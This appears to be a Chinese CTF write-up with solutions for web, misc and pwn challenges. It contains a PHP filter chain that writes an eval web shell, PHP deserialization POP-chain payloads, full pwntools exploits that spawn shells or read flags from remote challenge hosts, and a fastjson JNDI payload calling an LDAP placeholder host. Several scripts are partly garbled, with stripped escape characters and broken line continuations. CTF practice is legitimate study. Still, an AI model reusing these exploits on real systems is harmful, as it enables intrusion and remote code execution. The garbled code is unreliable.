rce_me
-
用伪协议直接RCE写shell
?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC%5fP271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR
|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT%5fJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-d
ecode/resource=index.php&0=%65%63%68%6f%20%27%3c%3f%3d%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3f%3e%27%3e%32%2e%74%78%74
-
SUID提权
step_by_step-v3
简单的POP链寻找EXP
<?php
// Builds and prints a serialized object graph (a POP chain) for the challenge;
// presumably the classes below mirror the target application's own classes.
// Nothing on this page is unserialize()d — the script only emits the payload.
error_reporting(0);
class yang
{
    public $y1;
    // Runs when an instance is coerced to a string (print/echo): calls
    // whatever callable is stored in $y1.
    public function __tostring()
    {
        ($this->y1)();
    }
    // Not reached by the chain built at the bottom of this script: there,
    // hint() is invoked on a bei object (which routes it to bei::__call).
    public function hint()
    {
        // $hey_mean_then is presumably defined by hint.php (not on this page).
        include_once('hint.php');
        if(isset($_GET['file']))
        {
            $file = $_GET['file'];
            // Regex blocklist guarding an include of a caller-supplied path;
            // the effective blocklist cannot be evaluated without hint.php.
            if(preg_match("/$hey_mean_then/is", $file))
            {
                die("nonono");
            }
            include_once($file);
        }
    }
}
class cheng
{
    public $c1;
    // Runs on unserialize(): writes c1->flag. When c1 is a bei (which declares
    // no $flag property) the write is routed to bei::__set.
    public function __wakeup()
    {
        $this->c1->flag = 'flag';
    }
    // Runs when the object is called like a function, e.g. from
    // yang::__tostring via ($this->y1)().
    public function __invoke()
    {
        $this->c1->hint();
    }
}
class bei
{
    public $b1;
    public $b2;
    // Runs on a write to an undeclared/inaccessible property: prints b1,
    // which string-coerces a yang stored there (yang::__tostring).
    public function __set($k1,$k2)
    {
        print $this->b1;
    }
    // Runs on a call to an undefined method (e.g. hint()): echoes b1 with the
    // same string coercion.
    public function __call($n1,$n2)
    {
        echo $this->b1;
    }
}
// How the graph unwinds when the target unserialize()s it:
//   cheng::__wakeup  -> bei::__set (write to c1->flag) -> print b1 (yang)
//   yang::__tostring -> cheng::__invoke (y1)          -> bei::__call (hint)
//   echo b1 (yang)   -> yang::__tostring              -> "phpinfo"()
// The author then reads the flag from the phpinfo() output.
$o = new cheng;
$o->c1= new bei();
$o->c1->b1 = new yang;
$o->c1->b1->y1= new cheng;
$o->c1->b1->y1->c1 = new bei;
$o->c1->b1->y1->c1->b1=new yang;
$o->c1->b1->y1->c1->b1->y1="phpinfo";
echo serialize($o);
?>
在phpinfo中找到flag。
ComeAndLogin
登陆后存在源码:
<?php
session_start();
// Authorization gate: the session flag must be strictly boolean true.
if($_SESSION["admin"] !== True){
    die("You are not admin");
}else{
    highlight_file(__FILE__);
    // $path is never assigned before this point, so this guard is always true.
    if(!isset($path)){
        $path = $_POST['path'];
        // Character-level blocklist: rejects fewer than three '/', any '.',
        // and is meant to reject "//". NOTE(review): with '/' as the delimiter
        // the pattern "////" parses as an empty pattern with modifiers "//",
        // so preg_match warns and returns false — that check likely never
        // fires; confirm on the target's PHP version.
        // There is no base-directory restriction: a defender should resolve
        // the path with realpath() and require it to stay inside an
        // allowlisted directory rather than filtering characters.
        if ((substr_count($path,'/') < 3)or(substr_count($path,'.') > 0) or (preg_match("////",$path)) ){
            die("invaild path");
        }
        // Arbitrary file read: the caller-supplied path is read and echoed.
        echo file_get_contents($path);
    }
}
`/` 要超过三个，不能含有 `.`，不能有 `//`。
直接用 2020 WMCTF 中的软链接套娃技巧读取 flag。
Safepop
原题:https://bbs.pediy.com/thread-271714.htm
<?php
class Fun{
    // Holds an array callable [object, method]. Being private, it serializes
    // under the mangled name "\0Fun\0func".
    private $func;
    public function __construct(){
        $this->func = [new Test,'getFlag'];
    }
}
class Test{
    // Empty stub: presumably only the class and method names matter for the
    // serialized payload; the real body lives on the target.
    public function getFlag(){
    }
}
class A{
    // Carrier for the Fun instance (assigned below).
    public $a;
}
class B{
    // Declared property; note the script below assigns a different,
    // dynamic property (`a`) on the B instance rather than `p`.
    public $p;
}
$Class_A = new A;
$Class_B = new B;
$Class_A->a = new Fun;
// NOTE(review): B declares $p, but `a` is set here as a dynamic property, so
// serialize() emits B with both `p` (null) and `a`; whether that is what the
// target's chain expects cannot be checked from this page.
$Class_B->a = $Class_A;
$payload= serialize($Class_B);
// Rewrites Fun's serialized property count from 1 to 2 after serialization
// (the object as built has exactly one property).
$payload = str_replace('"Fun":1:','"Fun":2:',$payload);
echo urlencode($payload);
MISC1
维吉尼亚解密得到压缩包密码:
Hello friends, I am the President of Ukraine Zelensky. The Russian army has just launched an attack on Ukraine, and the Kyiv airport has been controlled by the Russian army. Heard today is KFC Crazy Thursday, I need someone to bring me 29.94 finger-sucking original chicken as rations now. When I repel the Russian army, I will invite you to come to Ukraine to be the vice president.the password is GWHT@R1nd0yyds
解压得到:
用hint中的脚本编写解码脚本:
from PIL import Image
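# Decode the hidden text: each pixel's G (high byte) and B (low byte) channels
# hold one 16-bit code point; pixels are read row by row, left to right.
# `with` closes the image file once the pixels have been read (the original
# never closed it), and joining a list avoids repeated string concatenation.
chars = []
with Image.open("./out.bmp", "r") as pic:
    for y in range(pic.size[1]):
        for x in range(pic.size[0]):
            pix = pic.getpixel((x, y))
            chars.append(chr((pix[1] << 8) + pix[2]))
flag = ''.join(chars)
print(flag)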
-
flag在文章里面
flag{h1d3_1n_th3_p1ctur3}
MISC2
发现其中45.png文件损坏,缺少一个png头,加上即可,发现45.png与其他图片文件的MD5不一样,直接进行文件比较发现如下提示:
-
发现将这个当做可爱可莉.jpg的outguess密码来跑一下出现flag。
-
flag
YCBSQL
fakeNoOutput
# -*- encoding: utf-8 -*-
import sys
import os
import requests
from pwn import *
binary = './fakeNoOutput'
# pwntools exploit scaffold (the same template is reused by the other scripts
# on this page). The target is chosen by DEBUG: local process vs. remote.
# The path is a constant here; were it variable, os.chmod() would be safer
# than building a shell command.
os.system('chmod +x %s'%binary)
context.update( os = 'linux', arch = 'i386',timeout = 1)
context.binary = binary
context.log_level = 'debug'
elf = ELF(binary)
libc = elf.libc
# Overrides the line above: the challenge-supplied libc is the one used.
libc = ELF('./libc.so.6')
DEBUG = 0
if DEBUG:
    libc = elf.libc
    p = process(binary)
else:
    host = 'tcp.dasc.buuoj.cn'
    port = '28103'
    p = remote(host,port)
# NOTE(review): byte escapes look stripped by extraction ('x7f', 'x00', '33['
# would normally be '\x7f', '\x00', '\033['); confirm against the author's
# original before relying on these helpers.
# Leak helpers: read up to a marker byte and unpack the trailing address,
# logging it through ras().
l64 = lambda : ras(u64(p.recvuntil('x7f')[-6:].ljust(8,'x00')))
l32 = lambda : ras(u32(p.recvuntil('xf7')[-4:].ljust(4,'x00')))
uu64= lambda a = 6 : ras(u64(p.recv(a).ljust(8,'x00')))
uu32= lambda a = 4 : ras(u32(p.recv(a).ljust(4,'x00')))
rint= lambda x = 12 : ras(int( p.recv(x) , 16))
# Send/receive shorthands over the tube `p`.
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 33[1;36m 0x%x 33[0m' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
def ras( data ):
    """Log `data` as a leak (via lg) and return it unchanged, so the call can
    be chained inside the l64/l32/uu64 helpers above."""
    lg('leak' , data)
    return data
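def dbg(b=None):
    """Attach gdb to the live process `p`; `b` is an optional breakpoint spec.

    The original used `null` as the default, which is not a Python name and
    raises NameError as soon as the def is evaluated; `None` is the intended
    value. Without `b` the script pauses after attaching.
    """
    if b is None:
        gdb.attach(p)
        pause()
    else:
        gdb.attach(p, 'b %s' % b)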
def cmd(num):
    """Answer the next ':' prompt with `num`."""
    sla(':',num)
def attack():
    """Two-shot exploit: (1) overflow to leak fprintf's libc address,
    (2) overflow again to call system("/bin/sh").

    NOTE(review): Python 2 script (`.next()`); the trailing 'n' on each header
    line and the 'x01'/'x00' paddings are presumably '\n'/'\x01'/'\x00' with
    the escapes lost in extraction.
    """
    # Request header announcing a 5000-byte body.
    head = 'head /upload HTTP/1.1n'
    head += 'HTTP_SERVER1_token: 114514n'
    head += 'User-Agent: 114514n'
    head += 'Cookie: 114514n'
    head += 'Referer: 114514n'
    head += 'Content-Length: 5000n'
    sl(head)
    payload = 'Content:filename=114514'
    sl(payload)
    # raw_input()
    fprintf_got = elf.got['fprintf']
    main_addr = 0x8049F77
    send_addr = 0x080496A1
    # Body: 0x1044 bytes of padding, then a return into the binary routine the
    # author calls send_addr, with main as its return address and fprintf@GOT
    # as its first argument — the GOT entry comes back over the socket and is
    # read by l32() below.
    payload = 'a'*0x1044
    payload += flat(send_addr , main_addr , fprintf_got)
    payload = payload.ljust(5000 -25 ,'x01')
    # dbg('*0x8049B05')
    sl(payload)
    # Rebase libc from the leaked fprintf pointer.
    libc.address = l32() - libc.sym['fprintf']
    binsh_addr = libc.search('/bin/shx00').next()
    system_addr = libc.sym['system']
    # `rop` is built but never sent; the second payload is laid out by hand.
    rop = ROP(libc)
    rop.system(binsh_addr,0,0)
    # Second request: same overflow, now returning into system("/bin/sh").
    sl(head)
    payload = 'Content:filename=114514'
    sl(payload)
    payload = 'a'*0x1044
    payload += flat(system_addr,system_addr,binsh_addr)
    payload = payload.ljust(5000 -25 ,'x01')
    # dbg('*0x8049B05')
    sl(payload)
    p.interactive()
# Entry point: runs the exploit against the target selected by DEBUG above.
attack()
# Author's file header, kept as a trailing string literal in the original.
'''
@File : fakeNoOutput.py
@Time : 2022/09/03 11:01:49
@Author : Niyah
'''
ez_linklist
# -*- encoding: utf-8 -*-
import sys
import os
import requests
from pwn import *
binary = './ez_linklist'
# pwntools exploit scaffold; target chosen by DEBUG (local vs. remote).
# The path is a constant here; were it variable, os.chmod() would be safer
# than building a shell command.
os.system('chmod +x %s'%binary)
context.update( os = 'linux', arch = 'amd64',timeout = 1)
context.binary = binary
context.log_level = 'debug'
elf = ELF(binary)
libc = elf.libc
# Overrides the line above: the challenge-supplied libc is the one used.
libc = ELF('./libc.so.6')
DEBUG = 0
if DEBUG:
    libc = elf.libc
    p = process(binary)
    # p = process(['qemu-arm', binary])
    # p = process(['qemu-arm','-g','1234', binary])
    # p = process(['qemu-aarch64','-L','','-g','1234',binary])
else:
    host = 'tcp.dasc.buuoj.cn'
    port = '25325'
    p = remote(host,port)
# NOTE(review): byte escapes look stripped by extraction ('x7f', 'x00', '33['
# would normally be '\x7f', '\x00', '\033['); confirm against the author's
# original before relying on these helpers.
# Leak helpers: read up to a marker byte and unpack the trailing address,
# logging it through ras().
l64 = lambda : ras(u64(p.recvuntil('x7f')[-6:].ljust(8,'x00')))
l32 = lambda : ras(u32(p.recvuntil('xf7')[-4:].ljust(4,'x00')))
uu64= lambda a = 6 : ras(u64(p.recv(a).ljust(8,'x00')))
uu32= lambda a = 4 : ras(u32(p.recv(a).ljust(4,'x00')))
rint= lambda x = 12 : ras(int( p.recv(x) , 16))
# Send/receive shorthands over the tube `p`.
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 33[1;36m 0x%x 33[0m' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
def ras( data ):
    """Log `data` as a leak (via lg) and return it unchanged, so the call can
    be chained inside the l64/uu64 helpers above."""
    lg('leak' , data)
    return data
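def dbg(b=None):
    """Attach gdb to the live process `p`; `b` is an optional breakpoint spec.

    The original used `null` as the default, which is not a Python name and
    raises NameError as soon as the def is evaluated; `None` is the intended
    value. Without `b` the script pauses after attaching.
    """
    if b is None:
        gdb.attach(p)
        pause()
    else:
        gdb.attach(p, 'b %s' % b)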
def cmd(num):
    """Answer the next 'choice:' prompt with menu option `num`."""
    sla('choice:',num)
def add(size , text = flat(0 , 0x431)):
    """Menu 1: allocate a node of `size` bytes and send `text` as its content.

    The default content is evaluated once at definition time; it is a constant
    byte string, so sharing it between calls is harmless.
    """
    cmd(1)
    sla('Size:' , size)
    sa('Content:' , text)
def link(idx , idx2):
    """Menu 3: link node `idx` ("from") to node `idx2` ("to")."""
    cmd(3)
    sla('from:' , idx)
    sla('to:' , idx2)
def unlink(idx ,offset):
    """Menu 4: unlink node `idx` at `offset`.

    attack() also drives this menu by hand, because the program prints
    "Offset 0:" followed by node data before asking for the offset.
    """
    cmd(4)
    sla('Index:' , idx)
    sla('offset:' , offset)
def delete(idx ,offset):
    """Menu 2: delete node `idx` at `offset`.

    Prompts are matched without the trailing colon used by unlink().
    """
    cmd(2)
    sla('Index' , idx)
    sla('offset' , offset)
def attack():
    """Heap exploitation through the program's add/link/unlink/delete menu.

    Outline as written: shape the list so that unlink's "Offset 0:" echo
    leaks a heap pointer and later a libc pointer, rebase libc, steer an
    allocation onto __free_hook, write system there, and free a chunk whose
    data starts with "/bin/sh".
    NOTE(review): Python 2 script (`.next()`); 'x00' is presumably '\x00'
    with the escape lost in extraction.
    """
    add(0x70 )
    add(0x70)
    link(0 , 1)
    unlink(0,0)
    delete(1 , 0xff)
    add(0x70)
    add(0x70)
    add(0x70)
    add(0x70)
    for i in range(0x9):
        add(0x70)
    link(4,5)
    add(0x70)
    link(2,1)
    link(2,3)
    delete(2,2)
    delete(2,1)
    link(0,2)
    # Heap leak: the program echoes node 0's data after "Offset 0:" before
    # asking for the offset; 0x3e0 is the author's distance to the heap base.
    cmd(4)
    sla('Index:' , 0)
    ru('Offset 0:' )
    heap_base = uu64(6) - 0x3e0
    sla('offset:' , 0)
    add(0x18 , flat(0 , 0x30 ,heap_base + 0x490 ))
    delete(1,0)
    add(0x70)
    delete(2,0)
    add(0x18 , flat(0 , 0x30 ,heap_base + 0x490 ))
    link(0,5)
    # Libc leak through the same echo; -0x70 is the author's offset from the
    # leaked pointer to __malloc_hook.
    cmd(4)
    sla('Index:' , 0)
    ru('Offset 0:' )
    __malloc_hook = l64() - 0x70
    sla('offset:' , 0)
    libc.address = __malloc_hook - libc.sym['__malloc_hook']
    system_addr = libc.sym['system']
    __free_hook = libc.sym['__free_hook']
    # Computed but not used below.
    binsh_addr = libc.search('/bin/sh').next()
    lg('__free_hook',__free_hook)
    delete(4 , 1)
    add(0x30)
    # Chunk content filled with __free_hook-8 pointers; the next 0x70
    # allocation is evidently expected to land at __free_hook-8 (the exact
    # mechanism is not visible on this page).
    add(0x60 , flat(__free_hook-8 ,0)*6)
    add(0x70 )
    add(0x70 , flat('/bin/shx00', system_addr))
    # Freeing the chunk that starts with "/bin/sh" fires the hook.
    delete(8,0)
    # dbg()
    p.interactive()
# Entry point: runs the exploit against the target selected by DEBUG above.
attack()
# Author's file header, kept as a trailing string literal in the original.
'''
@File : ez_linklist.py
@Time : 2022/09/03 09:30:32
@Author : Niyah
'''
dream
# -*- encoding: utf-8 -*-
from ctypes import *
import sys
import os
import requests
from pwn import *
binary = './dream'
# pwntools exploit scaffold; target chosen by DEBUG (local vs. remote).
# The path is a constant here; were it variable, os.chmod() would be safer
# than building a shell command.
os.system('chmod +x %s'%binary)
context.update( os = 'linux', arch = 'amd64',timeout = 1)
context.binary = binary
context.log_level = 'debug'
elf = ELF(binary)
# Unlike the other scripts on this page, the libc bundled with the ELF is used.
libc = elf.libc
# libc = ELF('')
DEBUG = 0
if DEBUG:
    libc = elf.libc
    p = process(binary)
else:
    host = 'tcp.dasc.buuoj.cn'
    port = '24495'
    p = remote(host,port)
# NOTE(review): byte escapes look stripped by extraction ('x7f', 'x00', '33['
# would normally be '\x7f', '\x00', '\033['); confirm against the author's
# original before relying on these helpers.
# Leak helpers: read up to a marker byte and unpack the trailing address,
# logging it through ras().
l64 = lambda : ras(u64(p.recvuntil('x7f')[-6:].ljust(8,'x00')))
l32 = lambda : ras(u32(p.recvuntil('xf7')[-4:].ljust(4,'x00')))
uu64= lambda a = 6 : ras(u64(p.recv(a).ljust(8,'x00')))
uu32= lambda a = 4 : ras(u32(p.recv(a).ljust(4,'x00')))
rint= lambda x = 12 : ras(int( p.recv(x) , 16))
# Send/receive shorthands over the tube `p`.
sla = lambda a,b : p.sendlineafter(str(a),str(b))
sa = lambda a,b : p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ': 33[1;36m 0x%x 33[0m' % data)
se = lambda payload : p.send(payload)
rl = lambda : p.recv()
sl = lambda payload : p.sendline(payload)
ru = lambda a : p.recvuntil(str(a))
def ras( data ):
    """Log `data` as a leak (via lg) and return it unchanged, so the call can
    be chained inside the l64/uu32 helpers above."""
    lg('leak' , data)
    return data
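def dbg(b=None):
    """Attach gdb to the live process `p`; `b` is an optional breakpoint spec.

    The original used `null` as the default, which is not a Python name and
    raises NameError as soon as the def is evaluated; `None` is the intended
    value. Without `b` the script pauses after attaching.
    """
    if b is None:
        gdb.attach(p)
        pause()
    else:
        gdb.attach(p, 'b %s' % b)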
def cmd(num):
    """Answer the next 'choice:' prompt with menu option `num`."""
    sla('choice:',num)
def add(id , size , text = 'a'):
    """Menu 1: create a "dream" with identifier `id` and `size` bytes, then
    send `text` as its content (note: `id` shadows the builtin)."""
    cmd(1)
    sla('ID:' , id)
    sla('long:' , size)
    sa('dream:' , text)
def edit(idx , text):
    """Menu 3: overwrite dream `idx` with `text`."""
    cmd(3)
    sla('make?' , idx)
    sa('dream:' , text)
def show(idx ):
    """Menu 4: print dream `idx`; the output is consumed by attack()."""
    cmd(4)
    sla('show?' , idx)
def delete(idx ):
    """Menu 2: free dream `idx`."""
    cmd(2)
    sla('wake?' , idx)
def MX(z, y, total, key, p, e):
    """One XXTEA-style mixing term; this variant uses shifts 7/3 and 3/4.

    `z`, `y`, `total`, `e` are c_uint32; `key` is a list of four ints and
    `p` the word index. Returns a c_uint32 (the sum is computed on Python
    ints and truncated to 32 bits only at the end, as in the original).
    """
    zv, yv = z.value, y.value
    shift_mix = ((zv >> 7) ^ (yv << 3)) + ((yv >> 3) ^ (zv << 4))
    key_word = key[(p & 3) ^ e.value]
    sum_mix = (total.value ^ yv) + (key_word ^ zv)
    return c_uint32(shift_mix ^ sum_mix)
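def decrypt(n, v):
    """Decrypt `v`, a list of `n` 32-bit words, in place with the XXTEA-style
    round function MX and the fixed key [9, 5, 2, 7]; returns the same list.

    The inner-loop subscripts `v[p]` / `v[p-1]` were lost in extraction (the
    page shows bare `v`); they are reconstructed to mirror the v[0]/v[n-1]
    step that follows the loop — verify against the challenge binary.
    The caller passes `0x420/4`, which is an int only under Python 2.
    """
    key = [9, 5, 2, 7]
    delta = 0x9e3779b9
    rounds = 6 + 52 // n
    total = c_uint32(rounds * delta)
    y = c_uint32(v[0])
    e = c_uint32(0)
    while rounds > 0:
        e.value = (total.value >> 2) & 3
        # Walk from the last word down to word 1, each mixed with its left
        # neighbour; c_uint32() wraps the subtraction to 32 bits.
        for p in range(n - 1, 0, -1):
            z = c_uint32(v[p - 1])
            v[p] = c_uint32(v[p] - MX(z, y, total, key, p, e).value).value
            y.value = v[p]
        # Word 0's left neighbour wraps around to the last word.
        z = c_uint32(v[n - 1])
        v[0] = c_uint32(v[0] - MX(z, y, total, key, 0, e).value).value
        y.value = v[0]
        total.value -= delta
        rounds -= 1
    return v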
def pack_file(_flags = 0,
              _IO_read_ptr = 0,
              _IO_read_end = 0,
              _IO_read_base = 0,
              _IO_write_base = 0,
              _IO_write_ptr = 0,
              _IO_write_end = 0,
              _IO_buf_base = 0,
              _IO_buf_end = 0,
              _IO_save_base = 0,
              _IO_backup_base = 0,
              _IO_save_end = 0,
              _IO_marker = 0,
              _IO_chain = 0,
              _fileno = 0,
              _flags2 = 0,
              _lock = 0,
              _wide_data = 0,
              _mode = 0):
    """Lay out a forged 64-bit glibc _IO_FILE as 0xd8 bytes, field by field in
    struct order; omitted fields default to 0. The vtable pointer is not
    included (the caller appends it).

    NOTE(review): the `+` continuation lines below need trailing backslashes
    (or enclosing parentheses) to parse as one expression; they appear to have
    been lost in extraction. 'x00' is presumably '\x00'.
    """
    file_struct = p32(_flags) +
    p32(0) +
    p64(_IO_read_ptr) +
    p64(_IO_read_end) +
    p64(_IO_read_base) +
    p64(_IO_write_base) +
    p64(_IO_write_ptr) +
    p64(_IO_write_end) +
    p64(_IO_buf_base) +
    p64(_IO_buf_end) +
    p64(_IO_save_base) +
    p64(_IO_backup_base) +
    p64(_IO_save_end) +
    p64(_IO_marker) +
    p64(_IO_chain) +
    p32(_fileno) +
    p32(_flags2)
    # Pad to the fixed offsets of _lock (0x88), _wide_data (0xa0) and
    # _mode (0xc0), then to the 0xd8 struct size.
    file_struct = file_struct.ljust(0x88, 'x00')
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, 'x00')
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, 'x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, 'x00')
    return file_struct
def attack():
    """Leak libc and heap pointers through an encrypted show(), then forge a
    FILE object (_IO_wfile_jumps vtable, setcontext pivot) that runs an
    open/read/write ROP chain printing the file "flag".

    NOTE(review): Python 2 script (`0x420/4` integer division, `.next()`);
    'x00' is presumably '\x00'. The bare `dbg()` below is unconditional and
    tries to attach gdb even in the remote configuration.
    """
    add(0 ,0x420 , 'aaaaaaaa')
    add(1 ,0x400 , 'aaaaaaaa')
    add(2 ,0x410 , 'aaaaaaaa')
    add(3 ,0x400 )
    delete(0)
    add(4 , 0x430 )
    delete(2)
    show(0)
    # dbg()
    # show() yields 0x420 bytes read as 32-bit words, presumably encrypted by
    # the routine that decrypt() reverses.
    data = []
    for i in range(0x420/4):
        data.append(uu32())
    dbg()
    res = decrypt(0x420/4 , data)
    print(res)
    # Reassemble 64-bit values from word pairs: words 1:0 a libc pointer,
    # words 5:4 a heap pointer; -0x60-0x400 is the author's adjustment to
    # __malloc_hook.
    leak = ( res[1] << 32 ) + res[0]
    heap_addr = ( res[5] << 32 ) + res[4]
    __malloc_hook = leak - 0x60 - 0x400
    libc.address = __malloc_hook - libc.sym['__malloc_hook']
    libc_base = libc.address
    __free_hook = libc.sym['__free_hook']
    lg('__free_hook',__free_hook)
    lg('heap_addr',heap_addr)
    lg('addr',leak)
    stderr = libc.sym['stderr']
    # Rewrite the first four words of freed chunk 0; the last points at
    # stderr-0x20 (the intended effect is not shown on this page).
    edit(0 , flat(leak , leak , heap_addr ,stderr - 0x20))
    add(5 ,0x4ff)
    delete(5)
    add(6 , 0x450)
    _IO_wfile_jumps = libc.sym['_IO_wfile_jumps']
    # Hard-coded, libc-build-specific offset used as the fake FILE's _lock.
    _lock = libc_base + 0x1e6680
    # `syscall`, `pop_rax_ret`, `pop_rsi_ret` and `pop_rdx_pop_rbx_ret` are
    # computed but not used below; only pop_rdi_ret+1 (a plain `ret`) is.
    syscall = libc.sym['alarm'] + 5
    setcontext = libc.sym['setcontext']
    pop_rax_ret = libc.search(asm('pop rax; ret')).next()
    pop_rdi_ret = libc.search(asm('pop rdi; ret')).next()
    pop_rsi_ret = libc.search(asm('pop rsi; ret')).next()
    pop_rdx_pop_rbx_ret = libc.search(asm('pop rdx ; pop rbx ; ret')).next()
    ret = pop_rdi_ret + 1
    fake_io_addr = heap_addr + 0x840
    flag_addr = fake_io_addr + 0x300 + 0x10
    # Fake FILE with _wide_data pointing into the same payload, followed by
    # _IO_wfile_jumps as its vtable.
    file = pack_file(
        _flags = 0,
        _lock = _lock,
        _IO_write_ptr = 0xa81, # 0xb81
        _wide_data = fake_io_addr + 0xe0 ,
    ) + p64(_IO_wfile_jumps)
    rop = ROP(libc)
    rop.open(flag_addr , 0,0)
    rop.read(3 , flag_addr , 0x40)
    rop.write(1 , flag_addr , 0x40)
    # Wide-data block, the setcontext+61 pivot and the ROP chain; "flag" is
    # placed at payload offset 0x300, which matches flag_addr if chunk 2's
    # data starts at fake_io_addr+0x10 (the first 0x10 bytes of `file` are
    # dropped below).
    payload = p64(fake_io_addr + 0xe8)+'x00'*0x98
    payload += flat(fake_io_addr + 0xe0*2+0x10 , ret )
    payload += 'x00'*0x30
    payload += p64(fake_io_addr + 0xe0*2-0x68+8)
    payload += p64(setcontext+61)
    payload += rop.chain()
    payload = file[0x10:] + payload
    payload = payload.ljust( 0x300,'x00')+ 'flagx00'
    edit(2 , payload)
    edit(5 , flat(0 , 0x100)*0x49)
    # cmd(5)
    # The final allocation request is what triggers the forged FILE (the
    # author's commented breakpoint names _IO_wfile_overflow).
    cmd(1)
    sla('ID:' , 7)
    # dbg('_IO_wfile_overflow')
    sla('long:' , 0x4ff)
    # dbg()
    # p.success(getShell())
    p.interactive()
# Entry point: runs the exploit against the target selected by DEBUG above.
attack()
# Author's file header, kept as a trailing string literal in the original.
'''
@File : dream.py
@Time : 2022/09/03 17:28:55
@Author : Niyah
'''
simple_json
{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"ldap://xxx:port/xxx"}, "msg":{"$ref":"$.content.context"}}
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
